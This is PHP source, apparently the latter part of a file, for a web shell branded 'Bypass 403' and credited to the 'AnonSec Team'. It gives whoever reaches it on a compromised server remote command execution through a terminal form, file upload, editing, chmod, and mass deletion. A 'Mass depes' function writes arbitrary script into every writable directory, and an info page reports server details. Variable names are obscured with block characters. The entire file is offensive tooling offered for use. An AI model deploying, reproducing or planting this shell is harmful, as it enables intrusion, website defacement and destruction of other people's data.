$i .= (($p & 0x0008) ?
(($p & 0x0400) ? 's' : 'x' ) :
(($p & 0x0400) ? 'S' : '-'));
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ?
(($p & 0x0200) ? 't' : 'x' ) :
(($p & 0x0200) ? 'T' : '-'));
return $i;
exit();
	}
echo "
<!DOCTYPE HTML>
<html>
	<head>
		<meta name='author' content='$▛'>
		<meta name='robots' content='NOINDEX, NOFOLLOW'>
		<title>".$_SERVER['HTTP_HOST']." - $▛ 403</title>
		<meta name='viewport' content='width=device-width, initial-scale=0.60, user-scalable=no'>
		<link rel='stylesheet' href='//unknownsec1337.github.io/main/style_2.css'>
	</head>
<body>
<script src='//maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>
<script src='//cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/7.33.1/sweetalert2.min.js'></script>
	<div class='card text-dark'>
		<div class='card-header'>
			<a href='".$_SERVER['PHP_SELF']."'><h4>$▛ Bypass <i class='fas fa-biohazard'></i> <img alt='Bypass 403' src='//icons.getbootstrap.com/assets/icons/activity.svg' width='25px'> 403</h4></a>";
			if(isset($_GET['path'])){
				$path = $_GET['path'];
			}else{
				$path = getcwd();
		}
				$path = str_replace('\\','/',$path);
				$paths = explode('/',$path);
			foreach($paths as $id=>$pat){
			if($pat == '' && $id == 0){
				$a = true;
				echo '<i class="bi bi-hdd-rack"></i> : <a href="?path=/">/</a>';
			continue;
		}
			if($pat == '') continue;
				echo '<a href="?path=';
			for($i=0;$i<=$id;$i++){
				echo "$paths[$i]";
			if($i != $id) echo "/";
		}
			echo '">'.$pat.'</a>/';
		}
			echo " [ ".▟($path, p($path))." ]";
			echo "
		<div class='dropdown'>
				<button class='btn btn-dark dropdown-toggle' type='button' id='dropdownMenuButton' data-toggle='dropdown' aria-haspopup='true' aria-expanded='false'><i class='bi bi-menu-down'></i>&nbsp;Menu</button>
			<div class='dropdown-menu'>
				<a class='dropdown-item' href='?path=$path&dir=$path&id=upload'><i class='bi bi-upload'></i> Upload</a>
				<a class='dropdown-item' href='?path=$path&dir=$path&id=depes'><i class='bi bi-exclamation-diamond'></i> Mass depes</a>
				<a class='dropdown-item' href='?path=$path&dir=$path&id=delete'><i class='bi bi-trash'></i> Mass delete</a>
				<a class='dropdown-item' href='?path=$path&dir=$path&id=cmd'><i class='bi bi-terminal'></i> Terminal</a>
				<a class='dropdown-item' href='?path=$path&dir=$path&id=info'><i class='bi bi-info-circle'></i> Info server</a>
				<a class='dropdown-item' href='?path=$path&dir=$path&id=about'><i class='bi bi-info'></i> About</a></h5>
			</div>
		</div>
	</div>
</div>";
// tools nya
if(isset($_GET['dir'])) {
	$dir = $_GET['dir'];
	chdir($dir);
} else {
	$dir = getcwd();
}
$dir = str_replace("\\","/",$dir);
$scdir = explode("/", $dir);	
	for($i = 0; $i <= $c_dir; $i++) {
		$scdir[$i];
		if($i != $c_dir) {
		}
elseif($_GET['id'] == 'depes'){
	function mass_kabeh($dir,$namafile,$isi_script) {
	if(is_writable($dir)) {
		$dira = scandir($dir);
		foreach($dira as $dirb) {
			$dirc = "$dir/$dirb";
			$▚ = $dirc.'/'.$namafile;
			if($dirb === '.') {
				file_put_contents($▚, $isi_script);
			} elseif($dirb === '..') {
				file_put_contents($▚, $isi_script);
			} else {
				if(is_dir($dirc)) {
					if(is_writable($dirc)) {
						echo "[<font color=green>success</font>] $▚<br>";
						file_put_contents($▚, $isi_script);
						$▟ = mass_kabeh($dirc,$namafile,$isi_script);
					}
				}
			}
		}
	}
}
function mass_biasa($dir,$namafile,$isi_script) {
	if(is_writable($dir)) {
		$dira = scandir($dir);
		foreach($dira as $dirb) {
			$dirc = "$dir/$dirb";
			$▚ = $dirc.'/'.$namafile;
			if($dirb === '.') {
				file_put_contents($▚, $isi_script);
			} elseif($dirb === '..') {
				file_put_contents($▚, $isi_script);
			} else {
				if(is_dir($dirc)) {
					if(is_writable($dirc)) {
						echo "[<font color=green>success</font>] $dirb/$namafile<br>";
						file_put_contents($▚, $isi_script);
					}
				}
			}
		}
	}
}
if($_POST['start']) {
	if($_POST['tipe'] == 'massal') {
		echo "<div style='margin: 5px auto; padding: 5px'>";
	mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
		echo "</div>";
	} elseif($_POST['tipe'] == 'biasa') {
		echo "<div style='margin: 5px auto; padding: 5px'>";
	mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
		echo "</div>";
	}
} else {
echo "<br />$▘
<form method='post'>
	<b>Tipe:</b><br>
<div class='custom-control custom-switch'>
	<input type='checkbox' id='customSwitch' class='custom-control-input' name='tipe' value='biasa'>
	<label class='custom-control-label' for='customSwitch'>Biasa</label>
</div>
<div class='custom-control custom-switch'>
	<input type='checkbox' id='customSwitch1' class='custom-control-input' name='tipe' value='massal'>
	<label class='custom-control-label' for='customSwitch1'>Massal</label>
</div>
	<b><i class='bi bi-folder'></i> Lokasi:</b>
	<input class='form-control' type='text' name='d_dir' value='$dir' height='10'>
	<b><i class='bi bi-file-earmark'></i> File name:</b>
	<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'>
	<b><i class='bi bi-file-earmark'></i> Your script:</b>
	<textarea class='form-control' rows='7' name='script' placeholder='your secript here'></textarea><br />
	<input type='submit' name='start' value='Go' class='btn btn-primary btn-block'>
</form>";
	}
}
elseif($_GET['id'] == 'info'){
$disfunc = @ini_get("disable_functions");
if (empty($disfunc)) {
    $disfc = "<font color=green>NONE</font>";
} else {
    $disfc = "<font color=red>$disfunc</font>";
}
if(!function_exists('posix_getegid')) {
	$user = @get_current_user();
	$uid = @getmyuid();
	$gid = @getmygid();
	$group = "?";
} else {
	$uid = @posix_getpwuid(posix_geteuid());
	$gid = @posix_getgrgid(posix_getegid());
	$user = $uid['name'];
	$uid = $uid['uid'];
	$group = $gid['name'];
	$gid = $gid['gid'];
}
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=green>OFF</font>";
echo '<br />'.$▘.'
<div class="container">
	<div class="card text-dark">
		<div class="card-header">';
echo "<b>Uname: </b><font color=green>".php_uname()."</font><br />";
echo "<b>Software: </b><font color=green>".$_SERVER['SERVER_SOFTWARE']."</font><br />";
echo "<b>PHP version: </b><font color=green>".PHP_VERSION."</font> <b>PHP os:</b> <font color=green>".PHP_OS."</font><br />";
echo "<b>Server Ip: </b><font color=green>".gethostbyname($_SERVER['HTTP_HOST'])."</font><br />";
echo "<b>Your Ip: </b><font color=green>".ip()."</font><br />";
echo "<b>User: </b><font color=green>$user</font> ($uid) | <b>Group:</b> <font color=green>$group</font> ($gid)<br />";
echo "<b>Safe Mode: </b>$sm<br />";
echo "<kbd>Disable Function:</kbd><pre>$disfc</pre>";
	echo '</div>
	</div>
</div>';
}
elseif($_GET['id'] == 'about'){
echo '<br />'.$▘.'
<div class="container">
	<div class="card text-dark">
		<div class="card-header">';
echo "<img alt='AnonSec Team' class='img-thumbnail rounded mx-auto d-block' src='//unknownsec1337.github.io/AnonSec.jpg' width='150px'>";
echo "<b>- About Me -</b><br />";
echo "Thanks bre dah pake shell nya, jika ada yang error silahkan hubungi email di bawah.<br />Greetz : <a href=''>{ AnonSec Team } - And You</a><br />My email: <a href='mailto:unknownsec1337@gmail.com'>unknownsec1337@gmail.com</a>";
	echo '</div>
	</div>
</div>';
}
elseif($_GET['id'] == 'cmd') {
	echo "<br />$▘
<form method='post'>
	<div class='input-group mb-3'>
		<input type='text' class='form-control' name='cmd' placeholder='ls -la | id | uname -a'>
	<div class='input-group-append'>
		<input class='btn btn-primary' type='submit' name='id_cmd' value='Go'>
	</form>
	</div>
</div>";
	if($_POST['id_cmd']) {
	$cmd = $_POST['cmd'];
echo "
<div class='container'>
	<div class='card text-dark'>
		<div class='card-header'>
			<kbd><b>~$</b> $cmd</kbd><pre>".x($_POST['cmd'])."</pre>
		</div>
	</div>
</div>
";
	}
}
elseif($_GET['id'] == 'upload'){
echo '<br />'.$▘.'
<form method="post" enctype="multipart/form-data">
	<div class="input-group mb-3">
		<div class="custom-file">
			<label class="custom-file-label" for="inputGroupFile04">
				<input class="custom-file-input" id="inputGroupFile04" type="file" name="file" onchange="this.form.submit()" multiple>
			</label>
		</div>
	</div>
</form>';
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo '
<script type="text/javascript">
Swal.fire(
  "Success",
  "Success upload",
  "success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
  "Opsss",
  "Failed upload",
  "error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
	}
}
elseif($_GET['id'] == 'delete'){
function hapus_massal($dir,$namafile) {
	if(is_writable($dir)) {
		$dira = scandir($dir);
		foreach($dira as $dirb) {
			$dirc = "$dir/$dirb";
			$▚ = $dirc.'/'.$namafile;
			if($dirb === '.') {
				if(file_exists("$dir/$namafile")) {
					unlink("$dir/$namafile");
				}
			} elseif($dirb === '..') {
				if(file_exists("".dirname($dir)."/$namafile")) {
					unlink("".dirname($dir)."/$namafile");
				}
			} else {
				if(is_dir($dirc)) {
					if(is_writable($dirc)) {
						if(file_exists($▚)) {
							echo "[<font color=green>deleted</font>] $▚<br>";
							unlink($▚);
							$▟ = hapus_massal($dirc,$namafile);
						}
					}
				}
			}
		}
	}
}
if($_POST['start']) {
echo "<div style='margin: 5px auto; padding: 5px'>";
	hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "</div>";
} else {
echo "<br />$▘
<form method='post'>
	<b><i class='bi bi-folder'></i> Lokasi:</b>
	<input class='form-control' type='text' name='d_dir' value='$dir' height='10'>
	<b><i class='bi bi-file-earmark'></i> File name:</b>
	<div class='input-group mb-3'>
	<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'><br>
	<div class='input-group-append'>
	<input class='btn btn-primary btn-block' type='submit' name='start' value='Go'>
</form>
	</div>
	</div>";
		}
	}
}
// akhir tools
if(isset($_GET['filesrc'])){
echo "<br><b>name : </b>".basename($_GET['filesrc']);"</br>";
echo '<textarea class="form-control" rows="7" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea><br />';
}
elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '<br><b>name : </b>'.basename($_POST['path']);'</br>';
//Chmod
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo '
<script type="text/javascript">
Swal.fire(
  "Success",
  "Success Change Permission",
  "success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
  "Opsss",
  "Failed change permission",
  "error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
}
echo '<form method="POST">
	<div class="input-group mb-3">
<input class="form-control" name="perm" type="text" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'"/>
	<input class="form-control" type="hidden" name="path" value="'.$_POST['path'].'">
		<input class="form-control" type="hidden" name="opt" value="chmod">
		<div class="input-group-append">
	<input class="btn btn-primary btn-block" type="submit" value="Go"/>
	</form>
	</div>
</div>';
}
//rename folder
elseif($_GET['opt'] == 'btw'){
	$cwd = getcwd();
	echo '<form action="?option&path='.$cwd.'&opt=delete&type=buat" method="POST">
	<div class="input-group mb-3">
<input class="form-control" name="name" type="text" value="Folder"/>
	<input class="form-control" type="hidden" name="path" value="'.$cwd.'">
		<input class="form-control" type="hidden" name="opt" value="delete">
		<div class="input-group-append">
	<input class="btn btn-primary btn-block" type="submit" value="Go"/>
	</form>
	</div>
</div>';
}
//rename file
elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '
<script type="text/javascript">
Swal.fire(
  "Success",
  "Success change name",
  "success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
  "Opsss",
  "Failed change name",
  "error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
	<div class="input-group mb-3">
<input class="form-control" name="newname" type="text" value="'.$_POST['name'].'" />
	<input class="form-control" type="hidden" name="path" value="'.$_POST['path'].'">
		<input class="form-control" type="hidden" name="opt" value="rename">
		<div class="input-group-append">
	<input class="btn btn-primary btn-block" type="submit" value="Go"/>
	</form>
	</div>
</div>';
}
//edit file
elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '
<script type="text/javascript">
Swal.fire(
  "Success",
  "Edit file Success",
  "success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
  "Opsss",
  "Failed edit file",
  "error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
fclose($fp);
}
echo '<form method="POST">
<textarea class="form-control" rows="7" name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
	<input class="form-control" type="hidden" name="path" value="'.$_POST['path'].'">
		<input class="form-control" type="hidden" name="opt" value="edit">
	<input class="btn btn-primary btn-block" type="submit" value="Go"/>
</form><br />';
}
echo '</center>';
}else{
echo '</table><br /><center>';
//delete dir
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '
<script type="text/javascript">
Swal.fire(
  "Success",
  "Success delete dir",
  "success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
  "Opsss",
  "Failed delete dir",
  "error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
}
//delete file
elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo '
<script type="text/javascript">
Swal.fire(
  "Success",
  "Success delete file",
  "success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
  "Opsss",
  "Failed delete file",
  "error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
	}
}
echo '</center>';
$scandir = scandir($path);
$pa = getcwd();
echo '<div class="container-fluid"><table class="table table-striped table-bordered table-hover bg-white" cellspacing="0" cellpadding="7" width="100%">
<tr>
	<th class="text-center bg-dark text-white">Name</th>
		<th class="text-center bg-dark text-white">Last edit</th>
		<th class="text-center bg-dark text-white">Size</th>
		<th class="text-center bg-dark text-white">Permission</th>
	<th class="text-center bg-dark text-white">Options</th>
</tr>
</tr>
<tr>';
foreach($scandir as $dir){
$dt = date("Y-m-d g:i:s", filemtime("$path/$dir"));
if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
	echo "
	<tr>
	<td><img alt='folder' class='ico' src='//unknownsec1337.github.io/icon/folder.png'><a href=\"?path=$path/$dir\">$dir</a></td>
	<td><center>$dt</center></td>
	<td><center>DIR</center></td>
	<td><center>";
if(is_writable("$path/$dir")) echo '<font color="green">';
elseif(!is_readable("$path/$dir")) echo '<font color="red">';
	echo p("$path/$dir");
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
	echo "</center></td>
<td>
<form method=\"POST\" action=\"?option&path=$path\">
<div class='input-group mb-3 text-center'>
	<select class=\"form-control\" style=\"width: 40%;\" name=\"opt\">
		<option selected disabled>Select</option>
		<option value=\"delete\">Delete</option>
		<option value=\"chmod\">Chmod</option>
		<option value=\"rename\">Rename</option>
	</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
	<input type=\"hidden\" name=\"name\" value=\"$dir\">
		<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
			<div class='input-group-append'>
			<input class=\"btn btn-primary btn-block\" type=\"submit\" value=\"Go\"/>
		</form>
	</div>
</div>
</td>
</tr>";
}
foreach($scandir as $file){
	$ft = date("Y-m-d g:i:s", filemtime("$path/$file"));
	if(!is_file($path.'/'.$file)) continue;
	$s = filesize($path.'/'.$file)/1024;
	$s = round($s,3);
	if($s >= 1024){
		$s = round($s/1024,2).' MB';
	}else{
		$s = $s.' KB';
	}
echo '
<tr>
	<td><img alt="file" src="';
	$▖ = strtolower(pathinfo($file, PATHINFO_EXTENSION));
	if($▖ == "htaccess") {
		echo '//unknownsec1337.github.io/icon/htaccess.png';
	}elseif($▖ == "png" || $▖ == "jpg" || $▖ == "jpeg" || $▖ == "gif" || $▖ == "ico"){
		echo '//unknownsec1337.github.io/icon/images.png';
	}elseif($▖ == "php"){
		echo '//unknownsec1337.github.io/icon/php.png';
		}elseif($▖ == "ini"){
		echo '//unknownsec1337.github.io/icon/ini.png';
	}elseif($▖ == "html"){
		echo '//unknownsec1337.github.io/icon/html.png';
	}elseif($▖ == "js"){
		echo '//unknownsec1337.github.io/icon/js.png';
	}elseif($▖ == "css"){
		echo '//unknownsec1337.github.io/icon/css.png';
	}elseif($▖ == "json"){
		echo '//unknownsec1337.github.io/icon/json.png';
	}elseif($▖ == "txt"){
		echo '//unknownsec1337.github.io/icon/txt.png';
	}elseif($▖ == "sql"){
		echo '//unknownsec1337.github.io/icon/sql.png';
	}elseif($▖ == "py"){
		echo '//unknownsec1337.github.io/icon/py.png';
	}elseif($▖ == "pl"){
		echo '//unknownsec1337.github.io/icon/pl.png';
	}elseif($▖ == "dat"){
		echo '//unknownsec1337.github.io/icon/dat.png';
	}elseif($▖ == "md"){
		echo '//unknownsec1337.github.io/icon/md.png';
	}elseif($▖ == "sh"){
		echo '//unknownsec1337.github.io/icon/sh.png';
	}elseif($▖ == "zip"){
		echo '//unknownsec1337.github.io/icon/zip.png';
	}elseif($▖ == "rar"){
		echo '//unknownsec1337.github.io/icon/rar.png';
	}elseif($▖ == "xls"){
		echo '//unknownsec1337.github.io/icon/xls.png';
	}elseif($▖ == "excel"){
		echo '//unknownsec1337.github.io/icon/excel.png';
	}elseif($▖ == "word"){
		echo '//unknownsec1337.github.io/icon/word.png';
	}elseif($▖ == "doc"){
		echo '//unknownsec1337.github.io/icon/doc.png';
	}elseif($▖ == "mp4"){
		echo '//unknownsec1337.github.io/icon/mp4.png';
	}elseif($▖ == "mp3"){
		echo '//unknownsec1337.github.io/icon/mp3.png';
	}elseif($▖ == "pdf"){
		echo '//unknownsec1337.github.io/icon/pdf.png';
	}elseif($▖ == "csv"){
		echo '//unknownsec1337.github.io/icon/csv.png';
	}else{
		echo '//unknownsec1337.github.io/icon/dflt.png';
	}
echo '" class="ico">';
	echo "<a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
	<td><center>$ft</center></td>
	<td><center>$s</center></td>
	<td><center>";
if(is_writable("$path/$file")) echo '<font color="green">';
elseif(!is_readable("$path/$file")) echo '<font color="red">';
	echo p("$path/$file");
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
	echo "</center></td>
	<td>
<form method=\"POST\" action=\"?option&path=$path\">
<div class='input-group mb-3 text-center'>
<select class=\"form-control\" style=\"width: 40%;\" name=\"opt\">
	<option selected disabled>Select</option>
		<option value=\"delete\">Delete</option>
		<option value=\"edit\">Edit</option>
		<option value=\"rename\">Rename</option>
		<option value=\"chmod\">Chmod</option>
	<option value=\"download\">Download</option>
</select>
	<input type=\"hidden\" name=\"type\" value=\"file\">
		<input type=\"hidden\" name=\"name\" value=\"$file\">
			<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
		<div class='input-group-append'>
			<input class=\"btn btn-primary btn-block\" type=\"submit\" value=\"Go\"/>
		</form>
	</div>
</div>
</td>
</tr>";
	}
}
echo "
</table>
<div class='card text-dark'>
	<div class='card-header text-center'>
		<kbd>Copyright &copy; ".date("Y")." - <a href=''>$▛</a></kbd>
	</div>
</div>
<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>
<script src='//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js'></script>
<script src='//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>
</body>
</html>";
?>